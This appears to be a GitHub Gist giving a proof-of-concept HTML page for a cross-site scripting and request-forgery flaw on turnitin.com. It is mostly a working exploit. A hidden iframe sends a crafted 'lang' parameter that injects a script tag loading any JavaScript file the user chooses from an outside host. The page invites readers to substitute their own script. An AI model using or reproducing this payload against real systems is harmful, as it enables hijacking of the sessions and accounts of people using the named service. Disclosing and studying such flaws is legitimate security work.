Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
turnitin.com CSRF+XSS / proof of concept
<html>
<head>
<title>turnitin.com PoC</title>
</head>
<body>
<!--
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "https://arinerron.com/js/script.js".
-->
<iframe src="https://turnitin.com/s_class_portfolio.asp?r=12.6833765025708&amp;svr=303&amp;lang=en_us%22%7D%0Aalert(1)%7D%20%7Bvar jsElm = document.createElement(&quot;script&quot;)%7D{jsElm.type = &quot;application/javascript&quot;}{jsElm.src = &quot;[jsfile]&quot;}{document.body.appendChild(jsElm)}%20function%20meow()%20%7Bif(true)%7B%7D%7D//%3C/script%3E%3Ccenter%3E%3Ch1%3Epwned!%3C/h1%3E%3C/center%3E%0A//&amp;aid=38787&amp;cid=14921140" style="display:none"></iframe>
done
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.